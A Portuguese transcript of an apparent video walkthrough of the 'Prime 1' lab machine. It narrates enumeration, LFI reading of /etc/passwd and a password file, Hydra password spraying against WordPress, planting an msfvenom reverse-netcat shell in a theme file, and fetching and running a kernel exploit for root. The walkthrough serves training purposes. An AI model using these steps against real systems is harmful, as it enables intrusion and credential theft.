Fala pessoal, vamos começar a nossa 19ª máquina aqui, é a Prime 1. Essa máquina é uma máquina bem legal aí para estudar, ela dá algumas dicas no começo aí do que fazer. E tem algumas maneiras de explorar essa máquina aqui para fazer a pós-exploração dela, sem explorar kernel, mas eu quero trazer uns temas aqui para vocês para a gente estudar. Então a gente vai fazer a exploração do kernel dessa máquina. A primeira exploração que a gente faz nessa máquina é primeiro a gente faz alguns fuzzings dentro de alguns parâmetros. Então, para quem não sabe o que que é um fuzzing, é quando você faz um teste de injeção, né, dentro de algum parâmetro para conseguir descobrir qual é o argumento que você pode passar ali, ou então até mesmo o que a gente faz lá para enumerar as URLs, né, é parecido com um ataque de fuzzing, mas vocês já vão entender mais na prática aqui na hora da gente explorar a máquina, tá? Então, basicamente, primeiro a gente vai fazer um fuzzing dentro da aplicação para encontrar alguns arquivos com PHP, e depois a gente vai fazer um fuzzing em cima desses arquivos PHP para conseguir encontrar alguns parâmetros que são passados ali via GET para a aplicação. Depois que a gente faz essa parte de recon aí, a gente vai explorar um LFI na aplicação para conseguir pegar a credencial do usuário. Só que a gente vai conseguir pegar só a credencial e a gente não vai saber ainda o nome do usuário. Então a gente vai fazer um ataque de password spray para conseguir se logar com esse usuário, bem como a gente faz na vida real mesmo, onde você pega uma senha. Por exemplo, você vai fazer um hack lá no Beco do Exploit, né? A gente contratou você para fazer um pen teste. Aí você pega e enumera os nossos usuários lá no LinkedIn e tal, pega o nome da galera e aí você bota uma senha fixa, tipo uma senha óbvia, né? Porque, por exemplo, sei lá, Beco do Exploit arroba 2020. E aí você faz a autenticação de todos os usuários com essa senha para ver se algum deles vai ter essa senha. Então, tipo, esse é o ataque de password spray. Você sabe a senha, mas você não sabe os usuários. Então, você vai fazer um brute force dos usuários, né? Então, vai utilizar um padrão de números ou então tudo depende de como vai ser o ataque que você vai fazer, né? Como você conseguiu mapear que é os usuários o padrão de usuários da empresa. No nosso caso aqui a gente vai usar RockU mesmo para fazer o padrão dos usuários, mas vocês já vão ver isso na prática também. O mais bacana dessa máquina aqui, na pós-exploração que a gente vai fazer, antes de eu explicar sobre o exploit que a gente vai explorar aqui nesse Ubuntu 16.4, eu quero explicar para vocês um pouquinho aqui sobre como funciona, né, o que a gente vai explorar. Esse exploit ele é um exploit de buffer overflow. A gente vai falar mais para frente de buffer overflow aqui no nosso canal. Não vamos aprofundar muito nisso hoje, senão esse vídeo vai ficar muito longo. Mas vamos falar de alguns temas aqui que é legal vocês já começarem a dar uma estudada. O primeiro deles é syscall. É, então, para quem não sabe o que que é uma syscall, né, é uma chamada de sistema. Dentro do contexto do sistema operacional, a gente tem aqui a parte física, né, que é o hardware da máquina, né, memória, processamento. E dentro do sistema operacional, a gente tem o contexto do user space e do kernel space. Todos esses links aqui eles estão na descrição para vocês poderem estudar, tá? No contexto do user space, é onde está rodando todas as aplicações aí, o sistema operacional, né, os processos, os daemons, né? E o que acontece? Quando um processo desse, ou um sistema, ou etc., que estiver rodando aí, ele precisar executar algo no hardware, ele não consegue, por exemplo, alocar memória sozinho. Ele precisa que o kernel faça essa alocação de memória, por exemplo. E como é que ele vai fazer isso? O que está aqui dentro do user space vai fazer uma syscall aqui pro kernel, né? Vai fazer uma chamada aqui pro kernel, e o kernel vai executar esse tipo de ação. Ou seja, o kernel space, onde tem aqui o kernel, né? Ele tem muito mais permissão do que o que está dentro do user space, porque ele consegue utilizar diretamente o hardware aqui. Então, o que acontece? Boa parte dos sistemas, né? Tudo que está rodando aqui dentro do user space, a hora que ele precisa de algo que tem que ter permissão mais elevada para poder se executar aqui dentro, né, a nível de hardware, ele vai utilizar o que está dentro aqui do kernel space. Então, por que que eu estou explicando isso para vocês? Porque nesse exploit de kernel que a gente vai rodar aqui, o que que esse exploit faz? Primeiro de tudo, né, para entender esse exploit aqui,
Entre esses dois caras aqui, dentro do kernel, dependendo do kernel, né, dependendo da arquitetura, tem um cara chamado SMAP e SMAP, que é o Supervisor Mod Execution Protection, né, ou o Supervisor Model Access Prevention. O que esse cara faz? Ele é uma proteção para impedir que essas syscalls aqui sejam feitas de qualquer forma, né? Então ele faz a proteção aqui do kernel, né? Tem uma flag dentro do kernel aqui de 1 byte que é ou verdadeiro ou falso, né? Informando que está ativado ou não o SMAP. E esse SMAP ele faz essa proteção dessas requisições. Então esse exploit que o pesquisador aqui desenvolveu, ele dá um bypass no SMAP, no SMAP aqui, para ele conseguir mandar, para conseguir fazer uma requisição maliciosa para dentro do EBF aqui, ó, do BPF, eBPF. O que é o eBPF? O eBPF ele é responsável por atuar em algumas camadas de rede aqui, fazendo o controle e classificação de tráfego, trace de pacote, algumas coisas relacionadas à rede aqui. Então, esse cara aqui, o BPF, né, o pesquisador aqui, ele conseguiu encontrar um ponto onde ele conseguiu executar um buffer overflow dentro do BPF. E como o BPF roda dentro do contexto aqui do kernel space, então ele tem permissão, ele consegue ter permissão para fazer qualquer coisa aqui dentro do sistema, porque ele tem permissão de kernel space, né? Ele está aqui dentro do kernel space. Então, o que basicamente esse exploit faz? Ele vai primeiro dar um bypass no SMAP, depois ele vai fazer o buffer overflow aqui dentro do BPF, né? Vai inserir um backdoor e vai conseguir então o acesso de root para a gente. Esse assunto ele é bem complexo, né? Não dá para a gente conversar rapidinho assim sobre, né? Tem muita coisa para estudar a respeito. Então é mais para introduzir mesmo esse tipo de tema para vocês e vocês se aprofundarem aí nos estudos. Futuramente aqui no canal a gente vai falar mais sobre Buffer Overflow, vai estudar junto, vai estudar coisas mais low level, né? Então nesse primeiro momento aqui se atentem mais aos conceitos, né, e como fazer a exploração, que o estudo ele é constante, né? Então futuramente a gente vai aprofundando mais, beleza? Então a primeira coisa que a gente vai fazer aqui, né, nesse cara é escanear ele para ver o que está aberto lá de porta. Nmap menos Szinho Vzão menos P menos V 192.68.2.37, que é o IP que ele pegou aqui na minha infra. Opa, eu coloquei XV, SV. Para ver a versão dos serviços, todas as 65.535 portas em modo verboso. Bom, a princípio só tem a porta 80 e a 22 aberta lá, né? Um OpenSSH 7.2 e um Apache HTTPD 2.4.18. Então a gente pode abrir aqui no browser, ó, você vai ver que ele vai abrir já de cara essa tela aqui, não tem nenhuma dica aqui pra gente, né, do que fazer. Então a gente precisa enumerar esse cara. Dentro da enumeração aqui, a gente sempre vai buscar, né, por arquivos, vai buscar por diretórios. Então a primeira coisa que a gente sempre busca são diretórios na aplicação, né? Então a gente vai utilizar o dib aqui, http 192.168.2.37. Eu não vou passar a word list para ele usar a word list common mesmo. Vamos enumerar aqui para ver o que está rodando de diretório lá. Peraí. Beleza, ele já encontrou o diretório /dev aqui. A gente já viu que está rodando um WordPress lá também. Tá. Nesse momento já é o suficiente aqui para a gente poder acessar aqui. Vamos vir aqui no nosso burp, vamos ver o que tem aqui no /dev.
Então aqui a gente já chegou, né, no primeiro ponto aqui, né, do que o desenvolvedor da VM espera da gente aqui, né? Ele está dizendo aqui que na vida real é muito, é muito mais difícil, né, de se fazer os testes aí. É, a gente pode continuar fazendo aqui a nossa enumeração. Olha, ele já encontrou o index.php aqui, mas para você poder encontrar arquivos .php ou de outras extensões, você pode passar o menos x, né, maiúsculo e a extensão. Então, por exemplo, se a gente pôr um ponto .php aqui, olha, já encontrou o index.php e o image.php aqui. A gente vai conseguindo enumerar também os arquivos da aplicação aí, né? Você pode procurar também outros formatos como txt, por exemplo, ó. Olha, já achou aqui o secret.txt. Vamos chamar ele aqui no browser para ver o que é o secret.txt. É legal você procurar por extensões assim, porque você pode acabar encontrando arquivos de backup, né? Coisas bem legais aí dentro da aplicação. Ó, aqui ele está dizendo para a gente que é uma boa ideia a gente fazer testes de fuzzing, né? Utilizando o wfuzz, que ele deixou até o link do GitHub do wfuzz aqui. O wfuzz ele já vem aqui no Kali, tá? Você pode até abrir esse cara aí para ver o fonte aqui, né? Deixa eu ver aqui, onde é que eu deixei ele? Ele tem até uns exemplos aqui de como fazer os scans, né? Como rodar o wfuzz aqui. E ele está dizendo para a gente aqui, ó, dando uma dica, né? Para a gente ver procurar o location.txt, né? Para dar o próximo movimento. Então, se a gente já viu que na raiz não tem nenhum location.txt, senão ele teria aparecido aqui na nossa enumeração. Então, a gente imagina, como ele está mandando fazer um fuzzing, a gente imagina que possa estar dentro de algum desses arquivos PHP aqui. Então, a gente pode rodar o wfuzz dentro do index.php ali, para a gente ver qual que é o parâmetro que vai encontrar esse cara. Como a gente sabe que ele está como ele deu a dica pra gente aqui, né, que o arquivo se chama location.txt, a gente pode a gente pode passar então fazer o fuzzing para procurar qual é a variável que vai chamar isso aqui dentro do index ou do image.php. Se a gente for fazer essa requisição via get, né? Então a gente pode utilizar o wfuzz aqui para isso. Você pode dar um wfuzz aqui menos menos help para você poder dar uma lida aqui nos argumentos que você pode passar aqui pro wfuzz, mas a gente vai fazer a requisição aqui. Você chama o wfuzz menos c menos w, né, para passar o word list barra usr share word list. Vamos passar a word list do dirb mesmo, pode ser a big ou qualquer outra que você quiser. Aqui você passa o parâmetro menos menos HC para você dizer qual a resposta da requisição web você quer ignorar. Então a gente vai ignorar 404, porque o que não responder a gente não quer saber, a gente quer saber só o que responder, né? Você pode passar o menos HW aqui para dizer quantas requisições você quer fazer, pode colocar um 500 aqui. E então a gente passa o nosso endereço http // 192.168.2.37. A gente vai passar o arquivo, né, que a gente vai requisitar, que é o index.php. Então, aqui como parâmetro, a gente precisa descobrir qual que é a variável que vai chamar, né, o arquivo location.txt. Para a gente descobrir qual que é essa variável que vai aqui fazendo a passagem do parâmetro, a gente pode pôr o fuzz aqui. Então, o fuzzing que a gente vai fazer, ele vai pegar essa word list aqui e vai fazer a injeção aqui, ó, para poder descobrir qual que é o parâmetro que vai encontrar o location.txt. Se ele não encontrar aqui, a gente passa lá para o próximo arquivo PHP, né?
que eu escrevi de errado aqui? Deixa eu ver. Menos HC, menos HW. Ah, faltou o menos no W aqui na frente, no começo. Tá vendo que ele tá fazendo um monte de requisição? Pra gente poder arrumar isso aqui e ver só o que interessa pra gente. Tá vendo que ele tá mostrando um tamanho 7 aqui, ó, nas requisições? É igual lá no Burp que ele vai que ele vai se basear na resposta com um byte maior, né, para mostrar que foi possível fazer a requisição. Que tudo isso aqui está retornando 200 porque ele não tá, o comportamento da página lá é retornar 200, mas o que retornar o 200 com um byte maior significa que realmente é um parâmetro válido. Então como é que a gente faz para filtrar isso aqui? Você pode pelo menos menos HL e filtrar por esse tamanho de bytes aqui, né? Tipo, aqui tá com 7, então não é necessariamente bytes, eu não sei o que é qual é a medida que ele está usando aqui, né? Mas vamos colocar o 7 aqui, porque é o mesmo número de linhas que ele está usando aqui. Então agora se a gente executar, ó, ele vai, ó, tá vendo que ele tá rodando tudo numa linha só? Quando ele encontrar qual que é o diretório, ó, ele já encontrou. Tá vendo que ele tem um tamanho diferente, ó? Então ele encontrou aqui o parâmetro file. Então se a gente vier aqui, deixa eu até parar aqui. Se a gente vier aqui no browser agora, ó, que a gente chamar o index.php com o parâmetro file igual a location.txt, a gente conseguiu encontrar aqui qual que é o parâmetro, né, que recebe o location.txt. E ele está dando a dica aqui para a gente, né, para a próxima, a gente usar o secret 360 como parâmetro na próxima página de PHP. Então a outra página de PHP que a gente encontrou foi o image.php, né? Então a gente pode chamar ela aqui e passar como parâmetro o secret 360. Então, ó, ele conseguiu responder, né, alguma coisa aqui. Então a gente pode enumerar esse cara aqui, mas a gente já vai. Você poderia fazer o fuzzing aqui também, rodar um dirb aqui para procurar alguma coisa, né, dentro desse parâmetro secret 360. Mas a gente já vai partir direto aqui para pro nosso teste, né? Então, quando a gente vê um parâmetro assim, a gente já supõe que pode ter um include ali dentro daquele PHP. Então a gente pode testar, né, fazer alguns tipos de LFI, de RFI. Então a gente sempre testa primeiro um RFI, né? Se você botar aqui uma página externa, tipo https://beco.exploit.com, deixa eu jogar isso aqui pro repeater para a gente não precisar ficar fazendo isso aqui no browser. Então quando você manda aqui essa requisição, ó, ele não incluiu aqui opa, aqui já estou dando spoiler para vocês. https:// beco.exploit.com. Então, quando você manda aqui isso aqui seria um teste de RFI, né? Se ele incluísse o site do Beco aqui embaixo, né? Ou aparecesse esse código aqui, ele estava vulnerável a RFI. Então, você poderia lá no teu host remoto colocar um código em PHP, por exemplo, que é a linguagem aqui da aplicação, e quando ele executasse remotamente, ele ia renderizar o PHP aqui dentro, né? Ele ia interpretar o PHP aqui dentro. Não está vulnerável. Então a gente pode testar, partir para o teste de LFI, de testar local file inclusion, né? Então a gente pode botar aqui um /tc /pswd, né? Clássico. Então dessa forma a gente vai tentar incluir um arquivo de dentro do servidor, né? Ó, tá vendo que aqui na requisição ele trouxe e conseguiu injetar, né? Aqui conseguiu incluir o etc pswd. Então aqui a gente já consegue ler o pswd. E aqui nos vários aqui, ó, ele dá uma dica pra gente. Lembra que aqui dentro da estrutura, nesse pedaço aqui é onde tem as informações do usuário, né? Como nome completo, telefone, etc.
Ele deixou a informação pra gente aqui, ó, uma dica dizendo que a gente tem que encontrar o password.txt dentro do diretório /home /saquete aqui, ó. Então, já que a gente sabe que está vulnerável a LFI, né, a gente pode simplesmente incluir aqui, ó, o password.txt dentro do home do usuário Sakit aqui. Então ele deixou aqui ó, o password, né, que é o Follow the IPsec. Para quem não conhece o IPsec, ele é um cara que tem um canal aqui no YouTube, é animal, ele faz vários write-ups aí e vídeos de resolução de máquinas do Hack the Box e tal, ele manda muito bem. Podem procurar esse cara aqui no YouTube aqui que vocês não vão se arrepender. O Bom, a gente conseguiu então a senha aqui, follow the IPsec. Então a gente precisa descobrir qual que é o usuário e aonde que a gente vai se logar com esse cara, né? Então se a gente vier aqui na aplicação, vamos voltar lá no site, a gente sabe que tem um WordPress rodando lá, né? 268.237 tem um barra WordPress. Então, o que a gente vai fazer aqui para conseguir descobrir, né, onde a gente consegue logar? Você poderia fazer o teste no SSH também com essa senha, né, fazendo um password spray para procurar algum usuário, mas a gente vai fazer isso aqui no WordPress. Se você der um WP admin aqui, né, geralmente esse é o endereço default para se logar na aplicação. Então, se você tentar aqui admin, né, e a senha follow underline de underline IPsec, ele não vai conseguir logar. Mas a gente vai fazer um ataque de password spray aqui dentro desse WordPress para a gente conseguir descobrir qual que é o usuário, né, que se conecta com aquela senha. Na vida real, você ia fazer a enumeração dos usuários na empresa, né? Você ia fazer ia identificar qual que é o padrão de login de usuário para você poder criar uma word list né, com Crunch, alguma coisa do tipo, né? Para que se fosse uma sequência numérica ou alfanumérica, mas se for nome, ponto sobrenome, coisa assim, você vai fazer uma enumeração antes. Nesse caso aqui, lembra que a gente deu uma estudada já em outras máquinas aqui sobre a enumeração, né, no WordPress? A gente pode fazer esse password spray utilizando o próprio Burp aqui, mas ele demora bastante. Então, aqui tem um artigo na descrição para ajudar vocês aí de como fazer isso utilizando o Hydra. Para conseguir fazer essa requisição usando o Idris, só precisa passar alguns parâmetros de cookie aqui, ó. Então, ele está dizendo aqui que o WordPress, né, ele utiliza o parâmetro log para passar o login e pwd para passar o password. Então, se você for na aplicação aqui, né, e der um view page search, você vai ver aqui dentro da tela de login aqui, né? Que ele passa o parâmetro nesse form aqui via post, e a hora que ele dá o submit, o parâmetro de login é log e o parâmetro de password é pwd. Por que a gente precisa saber disso? Porque aqui dentro do Hydra, na hora de a gente fazer a requisição, a gente vai precisar passar esses parâmetros para poder fazer a requisição web, né? E ele precisa passar o cookie aqui também. Então, precisa passar o name e o value aqui do cookie. Então, para poder, para ele poder ser requisitado como um browser, né, para fazer o nosso ataque de dicionário aqui. Então, ele mostra aqui um exemplo, né, de como fazer o teste com o Hydra. A gente vai só copiar esse cara aqui e editar para nossa requisição. Já explico para vocês. Deixa eu vir aqui no nosso Kali. Então aqui, ó, ele está passando menos L maiúsculo e a lista de usernames. A gente vai fazer exatamente isso, vai passar a lista de usuários. Então barra USR, share, word lists. A gente vai utilizar RockU aqui na vida real, nem preciso dizer que você precisa fazer a tua lista, né? Vou passar o menos P minúsculo, por quê? Porque eu vou fixar a senha follow underline de IPsec. Porque a senha a gente já sabe que é essa, a gente só não sabe qual que é o usuário. Então isso é o ataque de password spray. Aqui no host a gente vai passar o IP do alvo, 192.68.2.37. Deixa o menos V aqui de verboso. HTTP form post
é o formato da requisição, então a gente está dizendo que ele vai fazer uma requisição web lá pro alvo. A gente tem que passar o diretório completo aqui, barra WordPress, senão ele vai fazer a requisição no limbo lá, né? Barra wplogin.php, que é o arquivo do PHP lá de login do WordPress. Então aqui veja a sintaxe que já tá, que a gente já pegou de lá, né? Ele está passando o login, que é o parâmetro log, que é para fazer o login do user. Então essa aqui é a variável para passar o user. E o PWD é o parâmetro do password, né, como a gente viu. Então ele está passando o PES aqui como variável para dentro do PWD. E o WP submit login, que é onde você aperta, dá o submit da requisição, né? Chama login. E então ele está passando os cookies aqui também, test cookie e o location. Então assim que a gente fizer essa execução aqui, peraí só um pouquinho que ele está dando um restore que eu já tinha feito aqui. rm hydra, aí. Então o que que esse cara vai fazer? Ó, ele vai começar a mandar um monte de requisição com um monte de usuário aqui da nossa word list, passando o password follow the IPsec. Tá vendo que ele já está encontrando um monte aqui, ó? É exatamente isso que vai acontecer quando você fizer um password spray. Ele vai achar um monte de usuário. Eu vou parar aqui porque tem muito usuário dentro dessa lista. A gente sabe que é Victor, primeiro por quê? Porque a gente tem acesso da máquina aqui e o usuário que está escrito aqui é o usuário Victor, a gente já poderia testar ele de primeira, né? Mas na vida real você não vai estar vendo a máquina, então você vai ter que fazer um password spray como esse aqui para conseguir descobrir aí qual é, né, o usuário. Então se a gente, agora que a gente sabe, né, vamos supor que você terminou aqui o teu password spray, não vou fazer isso aqui no vídeo porque vai demorar muito, você vai logar aqui com o Victor, follow, underline d, underline ipsec. Aí na WordList RockU tem a senha Victor, tá? Ele vai conseguir encontrar a senha assim, só você ter paciência aí para poder fazer o teste. Então nesse caso aqui desse CTF, a gente vai logou aqui no dashboard desse WordPress e é aqui que a gente vai fazer a abertura da nossa shell, né? Mas você poderia fazer esse mesmo teste lá utilizando o Hydra aqui para fazer o password spray lá no SSH, mas aqui a gente vai utilizar o próprio WordPress. Se você vier aqui na aparência, ele tem um editor de tema aqui, ó, isso é padrão no WordPress, e você consegue editar o tema que está usando. Só que aqui embaixo ele tem um botãozinho para salvar, então a gente não tem permissão de editar todos os temas aqui. Você vai ter que procurar um arquivo aqui dentro que você consiga editar. Então se você for navegando aqui entre as páginas PHP, né, você vai ver que em boa parte delas a gente não tem permissão para escrever na página aqui e alterar, né, o código. Só que tem um arquivo chamado secret.php aqui, ó, que provavelmente propositalmente eles deixaram esse arquivo aqui para a gente poder editar, né? Que ele até fala aqui, ó, finalmente, né, ó, finally you got a writable file, né? Finalmente a gente encontrou um arquivo que a gente pode escrever. Então aqui dentro a gente vai escrever a nossa shell, né, em PHP. Deixa eu criar aqui um payload de netcat reverso, msf venom -p cmd barra page payload, né? cmd barra unix barra reverse underline netcat lport igual 443, como sempre, lhost igual 192.68.2.4, que é o IP do meu Kali, menos F de formato, HAL para sem formato de código aqui, só para ele imprimir para a gente o payload. Agora a gente copia esse cara aqui. Eu já vou até startar o handler aqui, sudnc-lvp 443. Então a gente pode inserir aqui um exec dentro do PHP e aqui dentro do exec a gente insere a nossa shell. Pode salvar esse cara aqui. Opa, aqui que deu de errado aqui. Geralmente ele não deixa salvar quando tem algum erro de código. Fazer o update aqui. Deve ser um problema aqui no server, porque eu pus muito pouca memória nele. Aí fica dando uns crap aí no server. Vou esperar ele fazer o update, que não tem nada de errado no código aqui.
Aí, agora ele conseguiu editar. Então a gente conseguiu editar esse arquivo, né, que chama aqui secret.php. Só que a gente vai ter que conseguir chamar esse cara de algum jeito aqui para ele poder abrir a sessão com a gente, né? A gente sabe que ele está dentro do tema 29er aqui, ó. Então a gente vai ter que fazer uma enumeração aqui agora dentro do WordPress para descobrir onde está o diretório do tema aqui, né? Então se você vier aqui, lembrando que a gente já aprendeu um pouco sobre a numeração aqui do WordPress, né? Se você vier aqui dentro dos includes aqui, ó, você vai ver que tem um diretório dos temas aqui, ó, e o 29 é o tema padrão. Então, aqui é o diretório do tema e ele está chamando o style CSS. Então, a gente sabe que dentro do tema ali é onde tá os arquivos, né? A gente pode chamar ele, apagar o style CSS aqui e chamar o secret PHP. Então, assim que a gente chamou o secret PHP, a gente já abriu aqui a nossa shell dentro desse cara aqui. Então, se der um name-a aqui, você vai ver que está rodando aqui um Ubuntu 16.4, né? Então, se a gente procurar aqui, ó, search exploit, Ubuntu 16.04.2, opa, Serache exploit não vai funcionar, né? Search exploit, aí. Você vai encontrar vários exploits aqui, né, para Ubuntu. Tem vários aqui de kernel também. O que a gente vai utilizar é esse exploit aqui, né? Ele é para o kernel 4.13, aqui está rodando um 4.10, mas ele funciona na versão do Ubuntu 16.4 e vai funcionar nesse kernel aqui também. Então, como a gente já falou, né, ele vai fazer o primeiro bypass do SMAP, e depois ele vai criar vai criar uma requisição aqui para o BPF. Então ele vai fazer o buffer overflow dentro desse BPF, né, e ele vai fazer o buffer overflow, vai criar um backdoor para a gente lá dentro um backdoor que vai conseguir escrever, né, como root. Então a gente precisa só encontrar esse exploit aqui dentro do nosso Kali para poder compilar ele e executar lá. Lembrando que tem outras formas, né, de você fazer a pós-exploração aqui. Se você for escutar os processos que estão rodando aqui, tem um MySQL rodando como root e também tem uma lib de PHP que está sendo rodado como uma rotina, como root também no Chrome ali. Dá para ver se dá para. Você pode procurar aí também se você consegue envenenar a lib que nem a gente já fez antes, né? Ou explorar o MySQL. Mas fica aí como exercício para você tentar fazer de outra forma. Eu trouxe essa proposta da gente fazer a exploração do kernel para estudar esses temas relacionados a Syscall, User Space, Kernel Space, né? Entender como é que funciona esse conceito, tá? Então aqui se a gente procurar, né, Search Exploit, deixa eu ver o ID dele aqui. 45010. Você vai ver aqui o exploit, né, de kernel aqui, que é aquele mesmo que a gente tá utilizando ali. Você pode dar um search exploit "-m" e o nome do exploit aqui para copiar ele pro teu diretório. Eu já fiz isso, ele está aqui, né, o 45010. A gente só precisa compilar esse cara então para poder jogar para lá. Então gcc-o, eu vou chamar ele de file. E o nome do arquivo, né? 45010.c. Então eu já compilei ele aqui, agora eu posso jogar ele lá para o alvo. Vou dar um Python "-m" de módulo simple http server na 8080. Aqui eu vou no tmp, né, que é onde a gente consegue escrever. Então aqui dentro do tmp eu vou dar um wget http 192.168.2.4, que é o IP do meu Kali, na porta 8080 /file. Então ele baixou aqui o arquivo chmod mais x para dar permissão. Opa! Chmod mais x. Ele não deixa apagar se eu não spawnar um tty, mas eu vou fazer assim mesmo. Chmod mais x file.
que é o arquivo que a gente mandou para dar permissão de execução para ele. Então a gente executa, né, o file.barra file. Vamos ver se ele já se ele já rodou. Então agora que a gente conseguiu, ele rodou aqui o exploit, né, e a gente conseguiu então o acesso como root aqui na máquina. Então se a gente der um cd/root aqui, tem aqui alguns arquivos, né, de root. Eu vou dar um cat na flag do root aqui, root.txt. Então a gente conseguiu fazer, comprometer aí o kernel dessa máquina, né, fazendo esse processo aí dessa exploração. Então é legal vocês darem uma estudada sobre esses temas, entender o que que é o BPF, né, entender já começa a dar uma estudada no Buffer Overflow aí para vocês conseguirem entender os conceitos antes da gente começar a mexer com isso aqui no canal. Mas assim, por que que a gente não recomenda, né, que seja feita exploração de kernel? Porque dessa vez deu certo, a gente rodou, não comprometeu nada e não crashou a máquina nem nada do tipo. Mas o kernel space é realmente muito sensível, né, esse contexto. Então, às vezes aí no teu cliente, quando você estiver fazendo um pentest, pode ser que se você rode um exploit de kernel, você possa crashar, né, o sistema do cara lá e parar alguma coisa produtiva, o que seria bem ruim, né? Não é essa a intuição, a intenção, né, de um teste de intrusão. Então, galera, aqui embaixo na descrição tá o link de todo o material de apoio, né? Como sempre, todos esses links estão disponíveis para vocês aí embaixo. É, o link da VM de amanhã também está disponível aqui na descrição, tá? Se vocês precisarem de alguma coisa, manda lá no grupo. Se tiver alguma dúvida, né? Não esqueçam de se inscrever aqui no canal, quem ainda não estiver inscrito, beleza? E amanhã sai o vídeo novo, então até a próxima aí, pessoal. Falou!